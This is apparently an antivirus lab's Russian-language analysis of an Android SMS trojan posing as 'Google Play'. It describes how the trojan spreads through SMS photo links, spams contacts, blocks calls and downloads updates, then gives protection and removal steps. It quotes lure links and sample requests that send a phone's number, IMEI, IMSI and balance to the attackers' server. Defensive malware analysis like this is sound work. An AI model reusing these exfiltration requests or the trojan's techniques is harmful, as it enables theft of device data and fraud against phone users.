Trojan.SMSSend.Android
Антивирусная лаборатория Zillya! провела исследование атаки на смартфоны украинцев, о которой 1 сентября сообщил ресурс zik.ua и выявила следующее.
Общее описание
Троянская программа для мобильных телефонов, работающих на базе операционной системы Android. На момент проведения данного исследования получены массовые сигналы от пострадавших пользователей в Украине, России и Белоруссии.
Метод распространения
Пользователь получает SMS сообщение вида «Привет J Тебе фото https://www.soloboro.ru/gayn/????????????» где вместо знаков вопросов указан телефон пользователя, которому адресовано сообщение.
При этом ссылка на сайт может быть другой (нами зафиксировано как минимум три различных сайта, на которые вели ссылки).
При попытке открыть сообщения, на телефон загружается файл FOTO_ALBOM.apk и запускается установка троянского приложения. При этом система запрашивает у пользователя разрешение на доступ данного приложения к конфиденциальным данным. В случае положительного ответа пользователя в систему устанавливается троянское приложение.
После установки в системе появляется приложение «Google Play» размером около 200 Кб, являющееся троянской программой Trojan.SMSSend.Android. Его очень легко перепутать с системным приложением «Google Play Маркет», на что злоумышленниками и была сделана ставка.
Троян получает доступ к адресной книге устройства и начинает рассылку вирусных СМС всем адресатам, кроме тех, чьи номера начинаются на 1 (международный телефонный код США = +1). Данная процедура повторяется троянской программой регулярно, поэтому пользователи получают по несколько вирусных СМС с одного и того же зараженного телефона.
Вредоносные функции
В первую очередь, троян передаёт базовую информацию об устройстве пользователя на свой сервер: номер телефона, IMEI, IMSI, страну, версию операционной системы, модель аппарата, состояние мобильного счета и прочие данные. При этом троян способен анализировать сообщения от оператора о пополнении счет на конкретную сумму, где анализируются русскоязычные сообщения, содержащие слова «баланс» и «пополнено», как русскими, так и латинскими символами.
Примеры запросов, передающих информацию о телефоне:
https://goldfan.ru/bs/r.php/country=ua&phone=380632330522&op=Android&balance=0&k=12ge5vr9&imei=289212345678901&imsi=123456789012345&os=4.0.2&sdk=15&model=samsungNexusS&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/g.php/imei=289212345678901&balance=0&k=12ge5vr9&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/s.php/id=4&imei=289212345678901&time=2012-11-14 16:22:56&v=4
Одной из функций троянской программы является перехват входящих звонков и входящих СМС. Входящие звонки абонементу автоматически сбрасываются, лишая возможности других пользователей дозвониться к зараженному абоненту и предупредить его о рассылающихся с его телефона сообщениях.
Троян имеет функцию загрузки из Internet других компонентов и установки их в систему. Таким образом, у злоумышленников всегда остаётся возможность обновить функциональность троянской программы, что дает нам основания предположить, что данная троянская программа является всего лишь «транспортным механизмом» для более сложной и опасной троянской программы, которая может раздаваться адресно, конкретным абонентам. При этом загружаемая программа сохраняется с именем /mnt/sdcard/download/update.apk и запускается на установку автоматически.
Методы защиты
Данное троянское приложение может установиться на устройство только в том случае, если в его настройках безопасности включен параметр «Разрешить установку приложений из неизвестных источников». По умолчанию этот параметр выключен на всех устройствах, и включают его, как правило, для того что бы установить приложения из каких либо источников помимо “Google Play Market” (например с SD карты или другого сайта).
Таким образом, основной метод защиты – это всего лишь выключение параметра «Разрешить установку приложений из неизвестных источников» в настройках смартфона.
Инструкция по удалёнию
Прежде всего, необходимо остановить работу приложения «Google Play» (воспользоваться «Диспетчером задач» или «Диспетчером приложений») и затем выполнить его удаление обычным способом. Инструкция по удалению на официальном сайте Google: https://support.google.com/googleplay/answer/2521768?hl=ru
Также необходимо удалить инсталляционный файл вируса, который загружается на телефон под именем FOTO_ALBOM.apk.